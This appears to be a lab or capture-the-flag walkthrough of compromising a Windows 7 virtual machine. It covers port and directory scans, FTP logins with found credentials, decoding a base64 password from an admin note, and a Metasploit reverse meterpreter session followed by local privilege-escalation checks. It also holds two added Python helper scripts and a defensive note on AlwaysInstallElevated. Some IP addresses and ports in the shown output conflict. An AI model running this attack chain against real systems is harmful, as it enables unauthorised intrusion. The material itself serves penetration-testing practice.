3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.956 seconds (130.88 hosts/sec). 3 responded

┌──(root㉿kali)-[~]
└─# nmap 192.168.56.109
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-24 05:51 EST
Nmap scan report for 192.168.56.109
Host is up (0.00026s latency).
Not shown: 987 closed tcp ports (reset)
PORT      STATE SERVICE
21/tcp    open  ftp
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3389/tcp  open  ms-wbt-server
5357/tcp  open  wsdapi
8080/tcp  open  http-proxy
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49157/tcp open  unknown
MAC Address: 08:00:27:0B:E7:C5 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 18.30 seconds
┌──(root㉿kali)-[~]
└─# feroxbuster -u http://192.168.56.109:8080

by Ben "epi" Risher 🤓                 ver: 2.11.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://192.168.56.109:8080
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.11.0
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
403      GET        7l       20w      199c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404      GET        7l       23w      196c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET        8l       20w      178c http://192.168.56.109:8080/
301      GET        7l       20w      241c http://192.168.56.109:8080/Admin => http://192.168.56.109:8080/Admin/
301      GET        7l       20w      241c http://192.168.56.109:8080/admin => http://192.168.56.109:8080/admin/
301      GET        7l       20w      241c http://192.168.56.109:8080/ADMIN => http://192.168.56.109:8080/ADMIN/
[####################] - 25s   120006/120006  0s      found:4       errors:14
[####################] - 17s    30000/30000   1723/s  http://192.168.56.109:8080/
[####################] - 24s    30000/30000   1249/s  http://192.168.56.109:8080/Admin/
[####################] - 24s    30000/30000   1250/s  http://192.168.56.109:8080/admin/
[####################] - 18s    30000/30000   1631/s  http://192.168.56.109:8080/ADMIN/
View the page source.
After logging in, we see:
ftpuser:KeepGoingBro!!!
┌──(root㉿kali)-[~]
└─# lftp 192.168.56.108 -u ftpuser
Password:
lftp ftpuser@192.168.56.108:~> ls
[0] ls &
`ls' at 0 [Delaying before reconnect: 16]
lftp ftpuser@192.168.56.108:~> exit
[570091] Moving to background to complete transfers...

┌──(root㉿kali)-[~]
└─# ftp 192.168.56.109
Connected to 192.168.56.109.
220 Microsoft FTP Service
Name (192.168.56.109:root): ftpuser
331 Password required for ftpuser.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp>
ls shows a robots.txt; get it and read it.
It contains:
Admin's Secret Notes
1) Disable the firewall and Windows Defender.
2) Enable FTP and SSH.
3) Start the Apache server.
4) Don't forget to change the password for user 'always'. Current password is "WW91Q2FudEZpbmRNZS4hLiE=".
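The quoted "password" is base64 text, which is an encoding rather than any kind of protection, so it decodes offline with no key. The script below, an added example that is not part of the original write-up, pulls the user and the quoted token out of the note and decodes it only when it is well-formed base64 that yields printable text, so a plain password (like the FTP one found earlier) is passed through unchanged. NOTE_TEXT is the robots.txt content shown above; the two regexes are my assumption about the note's wording.

```python
"""Extract the credential from the admin note and decode it if it is base64."""
import base64
import binascii
import re
import string

# Copied from the robots.txt shown in the write-up.
NOTE_TEXT = """Admin's Secret Notes
1) Disable the firewall and Windows Defender.
2) Enable FTP and SSH.
3) Start the Apache server.
4) Don't forget to change the password for user 'always'. Current password is "WW91Q2FudEZpbmRNZS4hLiE=".
"""

# Assumed note wording: user 'NAME' ... password is "TOKEN"
USER_RE = re.compile(r"user '([^']+)'")
PASS_RE = re.compile(r'password is "([^"]+)"', re.IGNORECASE)
# Canonical base64 alphabet with at most two '=' pad characters.
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
PRINTABLE = set(string.printable) - set("\x0b\x0c")


def try_base64(token):
    """Return the decoded text if token is strict base64 yielding printable
    ASCII, otherwise None so a literal password is left alone."""
    if len(token) % 4 or not B64_RE.match(token):
        return None
    try:
        raw = base64.b64decode(token, validate=True)
    except (binascii.Error, ValueError):
        return None
    text = raw.decode("ascii", errors="replace")
    if not text or any(c not in PRINTABLE for c in text):
        return None
    return text


def extract_credential(note):
    """Return {'user', 'raw', 'password', 'encoded'} or None if absent."""
    user = USER_RE.search(note)
    pw = PASS_RE.search(note)
    if not (user and pw):
        return None
    token = pw.group(1)
    decoded = try_base64(token)
    return {
        "user": user.group(1),
        "raw": token,
        "password": decoded if decoded is not None else token,
        "encoded": decoded is not None,
    }


if __name__ == "__main__":
    cred = extract_credential(NOTE_TEXT)
    print(f"{cred['user']}:{cred['password']}  (base64-encoded: {cred['encoded']})")
```

The strict checks (length multiple of four, canonical alphabet, `validate=True`, printable result) matter because many real passwords such as "KeepGoingBro!!!" look nothing like base64 and must not be mangled; the decoded value is what gets tried against the 'always' account on the services the note lists.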
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 759 bytes
Final size of exe file: 7168 bytes
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The local listener hostname
   LPORT     8443             yes       The local listener port
   LURI                       no        The HTTP Path
Exploit target:
   Id  Name
   --  ----
   0   Wildcard Target
View the full module info with the info, or info -d command.
msf6 exploit(multi/handler) > set lhost 192.168.56.102
lhost => 192.168.56.102
msf6 exploit(multi/handler) > set lport 1234
lport => 1234
msf6 exploit(multi/handler) > run
[*] Started HTTPS reverse handler on https://192.168.56.102:8443
C:\Users\ftpuser\Videos>exit
exit
meterpreter > bg
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > session
[-] Unknown command: session. Did you mean sessions? Run the help command for more details.
msf6 exploit(multi/handler) > sessions
Active sessions ===============
  Id  Name  Type                     Information                    Connection
  --  ----  ----                     -----------                    ----------
  1         meterpreter x64/windows  Always-PC\ftpuser @ ALWAYS-PC  192.168.56.102:1234 -> 192.168.56.111:49186 (192.168.56.111)
msf6 exploit(multi/handler) > use multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > show options
   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION                           yes       The session to run this module on
   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits
View the full module info with the info, or info -d command.
msf6 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 192.168.56.111 - Collecting local exploits for x64/windows...
[*] 192.168.56.111 - 198 exploit checks are being tried...
[+] 192.168.56.111 - exploit/windows/local/always_install_elevated: The target is vulnerable.
[+] 192.168.56.111 - exploit/windows/local/bypassuac_comhijack: The target appears to be vulnerable.
[+] 192.168.56.111 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 192.168.56.111 - exploit/windows/local/cve_2019_1458_wizardopium: The target appears to be vulnerable.
[+] 192.168.56.111 - exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move: The service is running, but could not be validated. Vulnerable Windows 7/Windows Server 2008 R2 build detected!
[+] 192.168.56.111 - exploit/windows/local/cve_2020_1054_drawiconex_lpe: The target appears to be vulnerable.
[+] 192.168.56.111 - exploit/windows/local/cve_2021_40449: The service is running, but could not be validated. Windows 7/Windows Server 2008 R2 build detected!
[+] 192.168.56.111 - exploit/windows/local/ms10_092_schelevator: The service is running, but could not be validated.
[+] 192.168.56.111 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 192.168.56.111 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 192.168.56.111 - exploit/windows/local/ms15_078_atmfd_bof: The service is running, but could not be validated.
[+] 192.168.56.111 - exploit/windows/local/ms16_014_wmi_recv_notif: The target appears to be vulnerable.
[+] 192.168.56.111 - exploit/windows/local/tokenmagic: The target appears to be vulnerable.
[+] 192.168.56.111 - exploit/windows/local/virtual_box_opengl_escape: The service is running, but could not be validated.
[*] Running check method for exploit 47 / 47
[*] 192.168.56.111 - Valid modules for session 1:
============================
 #   Name                                                            Potentially Vulnerable?  Check Result
 -   ----                                                            -----------------------  ------------
 1   exploit/windows/local/always_install_elevated                   Yes                      The target is vulnerable.
 2   exploit/windows/local/bypassuac_comhijack                       Yes                      The target appears to be vulnerable.
 3   exploit/windows/local/bypassuac_eventvwr                        Yes                      The target appears to be vulnerable.
 4   exploit/windows/local/cve_2019_1458_wizardopium                 Yes                      The target appears to be vulnerable.
 5   exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move    Yes                      The service is running, but could not be validated. Vulnerable Windows 7/Windows Server 2008 R2 build detected!
 6   exploit/windows/local/cve_2020_1054_drawiconex_lpe              Yes                      The target appears to be vulnerable.
 7   exploit/windows/local/cve_2021_40449                            Yes                      The service is running, but could not be validated. Windows 7/Windows Server 2008 R2 build detected!
 8   exploit/windows/local/ms10_092_schelevator                      Yes                      The service is running, but could not be validated.
 9   exploit/windows/local/ms14_058_track_popup_menu                 Yes                      The target appears to be vulnerable.
 10  exploit/windows/local/ms15_051_client_copy_image                Yes                      The target appears to be vulnerable.
 11  exploit/windows/local/ms15_078_atmfd_bof                        Yes                      The service is running, but could not be validated.
 12  exploit/windows/local/ms16_014_wmi_recv_notif                   Yes                      The target appears to be vulnerable.
 13  exploit/windows/local/tokenmagic                                Yes                      The target appears to be vulnerable.
 14  exploit/windows/local/virtual_box_opengl_escape                 Yes                      The service is running, but could not be validated.
 15  exploit/windows/local/agnitum_outpost_acs                       No                       The target is not exploitable.
 16  exploit/windows/local/bits_ntlm_token_impersonation             No                       The target is not exploitable.
 17  exploit/windows/local/bypassuac_dotnet_profiler                 No                       The target is not exploitable.
 18  exploit/windows/local/bypassuac_fodhelper                       No                       The target is not exploitable.
 19  exploit/windows/local/bypassuac_sdclt                           No                       The target is not exploitable.
 20  exploit/windows/local/bypassuac_sluihijack                      No                       The target is not exploitable.
 21  exploit/windows/local/canon_driver_privesc                      No                       The target is not exploitable. No Canon TR150 driver directory found
 22  exploit/windows/local/capcom_sys_exec                           No                       The target is not exploitable.
 23  exploit/windows/local/cve_2020_0796_smbghost                    No                       The target is not exploitable.
 24  exploit/windows/local/cve_2020_1048_printerdemon                No                       The target is not exploitable.
 25  exploit/windows/local/cve_2020_1313_system_orchestrator         No                       The target is not exploitable.
 26  exploit/windows/local/cve_2020_1337_printerdemon                No                       The target is not exploitable.
 27  exploit/windows/local/cve_2020_17136                            No                       The target is not exploitable. The build number of the target machine does not appear to be a vulnerable version!
 28  exploit/windows/local/cve_2021_21551_dbutil_memmove             No                       The target is not exploitable.
 29  exploit/windows/local/cve_2022_21882_win32k                     No                       The target is not exploitable.
 30  exploit/windows/local/cve_2022_21999_spoolfool_privesc          No                       The target is not exploitable. Windows 7 is technically vulnerable, though it requires a reboot.
 31  exploit/windows/local/cve_2022_3699_lenovo_diagnostics_driver   No                       The target is not exploitable.
 32  exploit/windows/local/cve_2023_21768_afd_lpe                    No                       The target is not exploitable. The exploit only supports Windows 11 22H2
 33  exploit/windows/local/cve_2023_28252_clfs_driver                No                       The target is not exploitable. The target system does not have clfs.sys in system32\drivers\
 34  exploit/windows/local/cve_2024_30088_authz_basep                No                       The target is not exploitable. Version detected: Windows 7 Service Pack 1
 35  exploit/windows/local/gog_galaxyclientservice_privesc           No                       The target is not exploitable. Galaxy Client Service not found
 36  exploit/windows/local/ikeext_service                            No                       The check raised an exception.
 37  exploit/windows/local/lexmark_driver_privesc                    No                       The target is not exploitable. No Lexmark print drivers in the driver store
 38  exploit/windows/local/ms16_032_secondary_logon_handle_privesc   No                       The target is not exploitable.
 39  exploit/windows/local/ms16_075_reflection                       No                       The target is not exploitable.
 40  exploit/windows/local/ms16_075_reflection_juicy                 No                       The target is not exploitable.
 41  exploit/windows/local/ntapphelpcachecontrol                     No                       The check raised an exception.
 42  exploit/windows/local/nvidia_nvsvc                              No                       The check raised an exception.
 43  exploit/windows/local/panda_psevents                            No                       The target is not exploitable.
 44  exploit/windows/local/ricoh_driver_privesc                      No                       The target is not exploitable. No Ricoh driver directory found
 45  exploit/windows/local/srclient_dll_hijacking                    No                       The target is not exploitable. Target is not Windows Server 2012.
 46  exploit/windows/local/webexec                                   No                       The check raised an exception.
 47  exploit/windows/local/win_error_cve_2023_36874                  No                       The target is not exploitable.
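Fourteen "Yes" rows are not fourteen equally good options. The suggester prints three different positive phrases: "The target is vulnerable." means the module's check actually confirmed the condition (here, the AlwaysInstallElevated policy), while "The target appears to be vulnerable." and "The service is running, but could not be validated." are version-based guesses. On a Windows 7 box most of the guessed entries are win32k or driver exploits, and a failed kernel exploit blue-screens the target and costs the foothold. The script below, an added example that is not Metasploit code, ranks the table so confirmed checks come first and user-mode techniques are tried before kernel-mode ones. SAMPLE is a subset of rows copied from the table above; KERNEL_MODE is my own classification of which of the listed modules exploit the kernel.

```python
"""Rank local_exploit_suggester rows by how much the check actually proved."""
import re

# Positive phrases as the suggester prints them, most trustworthy first; they
# correspond to Metasploit's CheckCode tiers Vulnerable, Appears and Detected.
TIERS = [
    ("Vulnerable", "The target is vulnerable."),
    ("Appears", "The target appears to be vulnerable."),
    ("Detected", "The service is running, but could not be validated."),
]
TIER_ORDER = {name: i for i, (name, _) in enumerate(TIERS)}

# Assumption: modules from the table that exploit win32k/driver bugs. A failed
# attempt there can crash the host, so they sort after user-mode options.
KERNEL_MODE = {
    "cve_2019_1458_wizardopium", "cve_2020_1054_drawiconex_lpe", "cve_2021_40449",
    "ms14_058_track_popup_menu", "ms15_051_client_copy_image", "ms15_078_atmfd_bof",
    "ms16_014_wmi_recv_notif", "virtual_box_opengl_escape",
}

# Table row: "<index> <module path> <Yes|No> <check result text>"
ROW = re.compile(r"^\s*\d+\s+(exploit/\S+)\s+(Yes|No)\s+(.*?)\s*$")

# Rows copied from the suggester output in this write-up.
SAMPLE = """\
 1   exploit/windows/local/always_install_elevated                   Yes  The target is vulnerable.
 2   exploit/windows/local/bypassuac_comhijack                       Yes  The target appears to be vulnerable.
 4   exploit/windows/local/cve_2019_1458_wizardopium                 Yes  The target appears to be vulnerable.
 5   exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move    Yes  The service is running, but could not be validated. Vulnerable Windows 7/Windows Server 2008 R2 build detected!
 9   exploit/windows/local/ms14_058_track_popup_menu                 Yes  The target appears to be vulnerable.
 13  exploit/windows/local/tokenmagic                                Yes  The target appears to be vulnerable.
 15  exploit/windows/local/agnitum_outpost_acs                       No   The target is not exploitable.
 36  exploit/windows/local/ikeext_service                            No   The check raised an exception.
"""


def parse_rows(text):
    """Turn table lines into dicts; lines that are not rows are skipped."""
    rows = []
    for line in text.splitlines():
        m = ROW.match(line)
        if m:
            module, flag, result = m.groups()
            rows.append({"module": module, "candidate": flag == "Yes", "result": result})
    return rows


def tier_of(result):
    """Map a check-result sentence to its confidence tier ('Unknown' if none)."""
    for name, phrase in TIERS:
        if result.startswith(phrase):
            return name
    return "Unknown"


def rank(text):
    """Candidates ordered by tier, then user-mode before kernel-mode, then name."""
    ranked = []
    for row in parse_rows(text):
        if not row["candidate"]:
            continue
        row["tier"] = tier_of(row["result"])
        row["kernel_mode"] = row["module"].rsplit("/", 1)[1] in KERNEL_MODE
        ranked.append(row)
    ranked.sort(key=lambda r: (TIER_ORDER.get(r["tier"], len(TIERS)), r["kernel_mode"], r["module"]))
    return ranked


if __name__ == "__main__":
    for r in rank(SAMPLE):
        print(f"{r['tier']:<10} {'kernel' if r['kernel_mode'] else 'user':<6} {r['module']}")
```

On this box the ranking puts always_install_elevated alone at the top, which matches what the check verified: the Windows Installer only runs packages with SYSTEM rights when the AlwaysInstallElevated value is 1 under both HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer and HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer, and that is what the module's check reads before reporting "The target is vulnerable." The bypassuac_* entries only help if the session user is already a member of the local Administrators group, which the sessions output above does not establish for ftpuser. For defenders the fix is the same policy in reverse: leave both values at 0 (or the policy unconfigured), since an MSI is arbitrary code running as SYSTEM.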